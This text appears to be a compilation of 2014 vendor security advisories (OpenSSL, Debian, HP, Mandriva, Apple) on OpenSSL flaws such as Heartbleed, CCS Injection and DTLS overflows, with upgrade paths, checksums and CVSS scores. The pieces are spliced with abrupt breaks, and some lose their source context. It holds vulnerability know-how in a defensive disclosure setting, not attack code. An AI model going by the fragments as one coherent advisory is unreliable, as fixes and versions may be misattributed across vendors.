The attack can only be performed between a vulnerable client and server. OpenSSL clients are vulnerable in all versions of OpenSSL. Servers are only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution.
OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h.
Thanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and researching this issue. This issue was reported to OpenSSL on 1st May 2014 via JPCERT/CC.
The fix was developed by Stephen Henson of the OpenSSL core team partly based on an original patch from KIKUCHI Masashi.
DTLS recursion flaw (CVE-2014-0221)
By sending an invalid DTLS handshake to an OpenSSL DTLS client the code can be made to recurse eventually crashing in a DoS attack.
Only applications using OpenSSL as a DTLS client are affected.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.
Thanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This issue was reported to OpenSSL on 9th May 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
DTLS invalid fragment vulnerability (CVE-2014-0195)
A buffer overrun attack can be triggered by sending invalid DTLS fragments to an OpenSSL DTLS client or server. This is potentially exploitable to run arbitrary code on a vulnerable client or server.
Only applications using OpenSSL as a DTLS client or server affected.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.
Thanks to Jüri Aedla for reporting this issue. This issue was reported to OpenSSL on 23rd April 2014 via HP ZDI.
The fix was developed by Stephen Henson of the OpenSSL core team.
SSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198)
A flaw in the do_ssl3_write function can allow remote attackers to cause a denial of service via a NULL pointer dereference. This flaw only affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
This issue was reported in public. The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)
A race condition in the ssl3_read_bytes function can allow remote attackers to inject data across sessions or cause a denial of service. This flaw only affects multithreaded applications using OpenSSL 1.0.0 and 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
This issue was reported in public.
Anonymous ECDH denial of service (CVE-2014-3470)
OpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a denial of service attack.
OpenSSL 0.9.8 users should upgrade to 0.9.8za OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
Thanks to Felix Gröbert and Ivan Fratrić at Google for discovering this issue. This issue was reported to OpenSSL on 28th May 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
Other issues
OpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for CVE-2014-0076: Fix for the attack described in the paper "Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack" Reported by Yuval Yarom and Naomi Benger. This issue was previously fixed in OpenSSL 1.0.1g.
References
URL for this Security Advisory: http://www.openssl.org/news/secadv_20140605.txt
Note: the online version of the advisory may be updated with additional details over time. The following Common Vulnerabilities and Exposures project ids identify them:
CVE-2010-5298
A read buffer can be freed even when it still contains data that is
used later on, leading to a use-after-free.
CVE-2014-0076
ECDSA nonces can be recovered through the Yarom/Benger FLUSH+RELOAD
cache side-channel attack.
A third issue, with no CVE id, is the missing detection of the "critical" flag for the TSA extended key usage under certain cases.
Additionally, this update checks for more services that might need to be restarted after upgrades of libssl, corrects the detection of apache2 and postgresql, and adds support for the 'libraries/restart-without-asking' debconf configuration. This allows services to be restarted on upgrade without prompting.
The oldstable distribution (squeeze) is not affected by CVE-2010-5298 and it might be updated at a later time to address the remaining vulnerabilities.
For the testing distribution (jessie), these problems will be fixed soon. The updates are available from the following location using ftp:
ftp://srt03046:Secure12@ftp.usa.hp.com
User name: srt03046 Password: Secure12 ( NOTE: Case sensitive)
HP-UX Release HP-UX OpenSSL version
B.11.11 (11i v1) A.00.09.08za.001_HP-UX_B.11.11_32+64.depot
B.11.23 (11i v2) A.00.09.08za.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3) A.00.09.08za.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08za or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160).
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment (CVE-2014-0195).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c (CVE-2014-8275).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the FREAK issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations (CVE-2015-0204).
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support (CVE-2015-0205).
Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import (CVE-2015-0209).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293 http://openssl.org/news/secadv_20150108.txt http://openssl.org/news/secadv_20150319.txt
Updated Packages:
Mandriva Business Server 2/X86_64: 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security.
HP Systems Insight Manager v7.3 Hotfix kit HP Systems Insight Manager v7.2 Hotfix kit (The HP Systems Insight Manager v7.2 Hotfix kit is currently unavailable, but will be released at a later date.
http://h18013.www1.hp.com/products/servers/management/hpsim/download.html
NOTE: No reboot of the system is required after applying the HP SIM Hotfix kit. HP System Management Homepage versions 7.3.2 and earlier for Linux and Windows. HP System Management Homepage v7.2.4.1 is available for Windows 2003 only.
HP System Management Homepage v7.2.4.1 for Windows x86: http://www.hp.com/swpublishing/MTX-d775367b0a28449ca05660778b ftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p11160892/v98702
HP System Management Homepage v7.2.4.1 for Windows x64: http://www.hp.com/swpublishing/MTX-3a7aa5e233904ebe847a5e1555 ftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p221526337/v98704
HP System Management Homepage v7.3.3.1 for Windows x86: http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05 ftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p11160892/v98696
HP System Management Homepage v7.3.3.1 for Windows x64: http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba ftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p221526337/v98698
HP System Management Homepage v7.3.3.1 for Linux x86: http://www.hp.com/swpublishing/MTX-511c3e0b2f6f4f6bbc796fc619 ftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1980463820/v98694
HP System Management Homepage v7.3.3.1 for Linux x64: http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93 ftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1507410135/v98693
NOTE: HP System Management Homepage v7.3.3.1 for Linux x86 still contains OpenSSL v1.0.0d. As long as all other products which SMH V7.3.3.1 for Linux x86 communicates with have been upgraded to the latest versions, it will not be vulnerable to the exploits described in CVE-2014-0224.
Release Date: 2014-07-23 Last Updated: 2014-07-23
Potential Security Impact: Remote denial of service (DoS), code execution, unauthorized access, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Control server migration running on Linux and Windows which could be exploited remotely resulting in denial of service (DoS), code execution, unauthorized access, or disclosure of information.
References:
CVE-2010-5298 Remote Denial of Service CVE-2014-0076 Unauthorized Disclosure of Information CVE-2014-0195 Remote Unauthorized Access CVE-2014-0198 Remote Denial of Service CVE-2014-0221 Remote Denial of Service (DoS) CVE-2014-0224 Remote Unauthorized Access or Disclosure of Information CVE-2014-3470 Remote Code Execution or Unauthorized Access SSRT101647
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server migration v7.2.2, v7.3, v7.3.1, and v7.3.2
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0 CVE-2014-0076 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0221 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates to v7.3.2 of HP Insight Control server migration to resolve these vulnerabilities by upgrading to version 7.3.3. Please note that version 7.3.3 of HP Insight Control server migration is included on the HP Insight Management 7.3 Update 2 DVD.
HP has provided the installation binaries for download from the following web site by using the Receive for free option:
http://h18013.www1.hp.com/products/servers/management/fpdownload.html
Customers using HP Insight Control server migration v7.2.2 must first upgrade from v7.2.2 to v7.3 by using the HP Insight Management v7.3 DVD, and then upgrade to v7.3.3 by using the HP Insight Management v7.3 Update 2 DVD.
Customers running HP Insight Control server migration v7.3, v7.3.1, or v7.3.2, can use the HP Insight Control server migration v7.3 Update 2 DVD to complete the upgrade.
For more information on the upgrade process, please refer to the HP Insight Management Installation and Upgrade Guide and Release notes, which are available at the following location:
http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/ind ex.aspx?cat=insightmanagement
NOTE: The upgrade paths described above update the entire HP Insight Control software stack. To upgrade HP Insight Control server migration only, complete the following steps:
Copy "hpsmp.exe" to the local machine from the HP Insight Management v7.3.0 Update 2 DVD ISO. Create batch file with the following commands: @echo off hpsmp.exe /verysilent /SVCPATCH=Install_Through_Patch Copy the batch file to the folder where "hpsmp.exe" normally resides on the target system. Double click on the batch file. The HP Insight Control server migration installation starts in a command prompt. The command prompt closes when the installation finishes. After the installation completes it creates a log file (ICmigr.log) and an output file (ICmigroutput.xml) on the target system. Do not close or click on the command prompt while the process is completing. Do not run the command prompt in the background.
HISTORY Version:1 (rev.1) - 23 July 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2014-09-17-3 OS X Mavericks 10.9.5 and Security Update 2014-004
OS X Mavericks 10.9.5 and Security Update 2014-004 are now available and address the following:
apache_mod_php Available for: OS X Mavericks 10.9 to 10.9.4 Impact: Multiple vulnerabilities in PHP 5.4.24 Description: Multiple vulnerabilities existed in PHP 5.4.24, the most serious of which may have led to arbitrary code execution. This update addresses the issues by updating PHP to version 5.4.30 CVE-ID CVE-2013-7345 CVE-2014-0185 CVE-2014-0207 CVE-2014-0237 CVE-2014-0238 CVE-2014-1943 CVE-2014-2270 CVE-2014-3478 CVE-2014-3479 CVE-2014-3480 CVE-2014-3487 CVE-2014-3515 CVE-2014-3981 CVE-2014-4049
Bluetooth Available for: OS X Mavericks 10.9 to 10.9.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A validation issue existed in the handling of a Bluetooth API call. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4390 : Ian Beer of Google Project Zero
CoreGraphics Available for: OS X Mavericks 10.9 to 10.9.4 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or an information disclosure Description: An out of bounds memory read existed in the handling of PDF files. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with the iSIGHT Partners GVP Program
CoreGraphics Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of PDF files. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with the iSIGHT Partners GVP Program
Foundation Available for: OS X Mavericks 10.9 to 10.9.4 Impact: An application using NSXMLParser may be misused to disclose information Description: An XML External Entity issue existed in NSXMLParser's handling of XML. This issue was addressed by not loading external entities across origins. CVE-ID CVE-2014-4374 : George Gal of VSR (http://www.vsecurity.com/)
Intel Graphics Driver Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: Compiling untrusted GLSL shaders may lead to an unexpected application termination or arbitrary code execution Description: A user-space buffer overflow existed in the shader compiler. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4393 : Apple
Intel Graphics Driver Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple validation issues existed in some integrated graphics driver routines. These issues were addressed through improved bounds checking. CVE-ID CVE-2014-4394 : Ian Beer of Google Project Zero CVE-2014-4395 : Ian Beer of Google Project Zero CVE-2014-4396 : Ian Beer of Google Project Zero CVE-2014-4397 : Ian Beer of Google Project Zero CVE-2014-4398 : Ian Beer of Google Project Zero CVE-2014-4399 : Ian Beer of Google Project Zero CVE-2014-4400 : Ian Beer of Google Project Zero CVE-2014-4401 : Ian Beer of Google Project Zero CVE-2014-4416 : Ian Beer of Google Project Zero
IOAcceleratorFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A null pointer dereference existed in the handling of IOKit API arguments. This issue was addressed through improved validation of IOKit API arguments. CVE-ID CVE-2014-4376 : Ian Beer of Google Project Zero
IOAcceleratorFamily Available for: OS X Mavericks 10.9 to 10.9.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An out-of-bounds read issue existed in the handling of an IOAcceleratorFamily function. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4402 : Ian Beer of Google Project Zero
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: A local user can read kernel pointers, which can be used to bypass kernel address space layout randomization Description: An out-of-bounds read issue existed in the handling of an IOHIDFamily function. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4379 : Ian Beer of Google Project Zero
IOKit Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata. CVE-ID CVE-2014-4388 : @PanguTeam
IOKit Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4389 : Ian Beer of Google Project Zero
Kernel Available for: OS X Mavericks 10.9 to 10.9.4 Impact: A local user can infer kernel addresses and bypass kernel address space layout randomization Description: In some cases, the CPU Global Descriptor Table was allocated at a predictable address. This issue was addressed through always allocating the Global Descriptor Table at random addresses. CVE-ID CVE-2014-4403 : Ian Beer of Google Project Zero
Libnotify Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: A malicious application may be able to execute arbitrary code with root privileges Description: An out-of-bounds write issue existed in Libnotify. This issue was addressed through improved bounds checking CVE-ID CVE-2014-4381 : Ian Beer of Google Project Zero
OpenSSL Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: Multiple vulnerabilities in OpenSSL 0.9.8y, including one that may lead to arbitrary code execution Description: Multiple vulnerabilities existed in OpenSSL 0.9.8y. This update was addressed by updating OpenSSL to version 0.9.8za. CVE-ID CVE-2014-0076 CVE-2014-0195 CVE-2014-0221 CVE-2014-0224 CVE-2014-3470
QT Media Foundation Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: Playing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of RLE encoded movie files. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-1391 : Fernando Munoz working with iDefense VCP, Tom Gallagher & Paul Bates working with HP's Zero Day Initiative
QT Media Foundation Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: Playing a maliciously crafted MIDI file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of MIDI files. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4350 : s3tm3m working with HP's Zero Day Initiative
QT Media Foundation Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4 Impact: Playing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of the 'mvhd' atoms. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4979 : Andrea Micalizzi aka rgod working with HP's Zero Day Initiative
ruby Available for: OS X Mavericks 10.9 to 10.9.4 Impact: A remote attacker may be able to cause arbitrary code execution Description: A heap buffer overflow existed in LibYAML's handling of percent-encoded characters in a URI. This issue was addressed through improved bounds checking. This update addresses the issues by updating LibYAML to version 0.1.6 CVE-ID CVE-2014-2525
Note: OS X Mavericks 10.9.5 includes the security content of Safari 7.0.6: http://support.apple.com/kb/HT6367
OS X Mavericks v10.9.5 and Security Update 2014-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUGkP0AAoJEBcWfLTuOo7tygQP/1vHYXtWy6492Tjj6ycymWa+ Ct0eCCBU/AUi5ODNDeV9ddWkuFeXKbgQSHoPU19IPcIBAKnYUupVJSJ/cEHfSthh CiROjJw8Bt8comn04BgggHieLveN1xQCXQDcO29kBIpQr394XKS0lNXP//Z0oG5V sCnEDPz/0R92mwT5XkKD9WC7G/WjybS5V7BjEbdzDOn4qdTVje05xI5pof+fkeQ1 hFHo7uTCDkSzLH2YxrQHifNVyItz8AgnNHwH7zc6XmNtiNFkiFP/KU6BYyr8WiTQ Jb3pyLB/Xvmbd0kuETnDNvV0oJc88G38a++xZPnuM7zQrW/TQkkKQpiqKtYAiJuw ZhUoky620/7HULegcYtsTyuDFyEN6whdSmHLFCJzk2oZXZ7MPA8ywCFB8Y79rohW 5MTe/zVUSxxYBgVXpkmhPwXYSTINeUJGJA1RQtXhC2Hh6O2jeqJP2H0hTmgsCBRA 3X/2CGoyAAgoKTJwgXk07tBbJWf+wQwAvUN9L1Yph+uOvvUzqFt8LNEGw9jVPsZl QHcSEW/Ef/HK/OLwVZiPqse6lRJAdRZl5//vm4408jnXfJCy6KnvxcsO4Z1yTyoP kCXdWlSLBiidcRRWBfoQBSC3gANcx9a56ItWieEvJrdNOiyhb+gqEk7XraOlb/gf k4w2RKNm0Fv+kdNoFAnd =gpVc -----END PGP SIGNATURE-----
. These vulnerabilities include:
-
The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "POODLE", which could be exploited remotely resulting in disclosure of information.
-
HP StoreVirtual VSA Software 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
